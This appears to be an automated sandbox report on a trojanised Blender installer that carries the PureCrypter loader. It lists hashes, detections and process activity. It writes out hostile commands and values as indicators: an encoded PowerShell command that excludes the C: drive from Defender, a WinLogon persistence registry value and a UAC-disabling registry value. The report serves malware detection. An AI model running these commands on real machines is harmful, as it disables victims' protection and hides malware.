Analysis
- max time kernel: 38s
- max time network: 300s
- platform: windows7_x64
- resource: win7-20220901-en
- resource tags: arch:x64, arch:x86, image:win7-20220901-en, locale:en-us, os:windows7-x64, system
- submitted: 02/02/2023, 10:14
Static task
- static1
Behavioral task
- behavioral1: Sample blender-3.4.1-windows-x64.exe, Resource win7-20220901-en
Behavioral task
- behavioral2: Sample blender-3.4.1-windows-x64.exe, Resource win10v2004-20220812-en
General
- Target: blender-3.4.1-windows-x64.exe
- Size: 683.8MB
- MD5: aedf8960317a0effcd89c5d816137067
- SHA1: 4e074a8e180a9d3248f5fceadf28ea4f7146b33e
- SHA256: eeaaa0e20ba43f13e0b62862979abe7f50bb558a812fc4aa729e946fdbe54e98
- SHA512: f1e7d861e01ebcc69cad9cceee712885ef1739a84923787bfe7d9e5e9e108b2721b2a1e916e4a33fa947ac84ed6010c1d32fdf0091b3a9ca7f34738a6be6981a
- SSDEEP: 3072:mcqqdOyJocZB0O7i4Cg3DILI48p8ERDuwBbEUA:T/dOyJovrg3/ppDuwBYU
Malware Config
Signatures
Detect PureCrypter injector 1 IoCs
  resource: behavioral1/memory/1156-56-0x0000000007110000-0x00000000073EA000-memory.dmp
  yara_rule: family_purecrypter
Modifies WinLogon for persistence 2 TTPs 1 IoCs
  description: Set value (str)
  ioc: \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Tqhtsdgnsm\\Vcelkcpar.exe\","
  Process: blender-3.4.1-windows-x64.exe

PureCrypter
  PureCrypter is a .NET malware loader first seen in early 2021.

UAC bypass 1 IoCs
  description: Set value (int)
  ioc: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"
  Process: InstallUtil.exe
Looks up external IP address via web service 1 IoCs
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow: 7
  ioc: eth0.me
Suspicious use of SetThreadContext 1 IoCs
  description: PID 1156 set thread context of 820
  pid: 1156
  Process: blender-3.4.1-windows-x64.exe
  procid_target: 30
Enumerates physical storage devices 1 TTPs
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Suspicious behavior: EnumeratesProcesses 1 IoCs
  pid: 320
  Process: powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs
  description: Token: SeDebugPrivilege; pid: 1156; Process: blender-3.4.1-windows-x64.exe
  description: Token: SeDebugPrivilege; pid: 320; Process: powershell.exe
  description: Token: SeDebugPrivilege; pid: 820; Process: InstallUtil.exe
Suspicious use of WriteProcessMemory 20 IoCs
  (columns: description; pid; Process; procid_target)
  PID 1156 wrote to memory of 680; 1156; blender-3.4.1-windows-x64.exe; 27
  PID 1156 wrote to memory of 680; 1156; blender-3.4.1-windows-x64.exe; 27
  PID 1156 wrote to memory of 680; 1156; blender-3.4.1-windows-x64.exe; 27
  PID 1156 wrote to memory of 680; 1156; blender-3.4.1-windows-x64.exe; 27
  PID 680 wrote to memory of 320; 680; cmd.exe; 29
  PID 680 wrote to memory of 320; 680; cmd.exe; 29
  PID 680 wrote to memory of 320; 680; cmd.exe; 29
  PID 680 wrote to memory of 320; 680; cmd.exe; 29
  PID 1156 wrote to memory of 820; 1156; blender-3.4.1-windows-x64.exe; 30
  PID 1156 wrote to memory of 820; 1156; blender-3.4.1-windows-x64.exe; 30
  PID 1156 wrote to memory of 820; 1156; blender-3.4.1-windows-x64.exe; 30
  PID 1156 wrote to memory of 820; 1156; blender-3.4.1-windows-x64.exe; 30
  PID 1156 wrote to memory of 820; 1156; blender-3.4.1-windows-x64.exe; 30
  PID 1156 wrote to memory of 820; 1156; blender-3.4.1-windows-x64.exe; 30
  PID 1156 wrote to memory of 820; 1156; blender-3.4.1-windows-x64.exe; 30
  PID 1156 wrote to memory of 820; 1156; blender-3.4.1-windows-x64.exe; 30
  PID 1156 wrote to memory of 820; 1156; blender-3.4.1-windows-x64.exe; 30
  PID 1156 wrote to memory of 820; 1156; blender-3.4.1-windows-x64.exe; 30
  PID 1156 wrote to memory of 820; 1156; blender-3.4.1-windows-x64.exe; 30
  PID 1156 wrote to memory of 820; 1156; blender-3.4.1-windows-x64.exe; 30
Processes

- C:\Users\Admin\AppData\Local\Temp\blender-3.4.1-windows-x64.exe (PID 1156, depth 1)
  command line: "C:\Users\Admin\AppData\Local\Temp\blender-3.4.1-windows-x64.exe"
  - Modifies WinLogon for persistence
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  - C:\Windows\SysWOW64\cmd.exe (PID 680, depth 2)
    command line: "C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
    (the -ENC argument is base64-encoded UTF-16LE; it decodes to "set-mppreference -exclusionpath C:\", a Set-MpPreference call that adds a Microsoft Defender exclusion covering the entire C: drive)
    - Suspicious use of WriteProcessMemory

    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 320, depth 3)
      command line: powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe (PID 820, depth 2)
    command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    - UAC bypass
    - Suspicious use of AdjustPrivilegeToken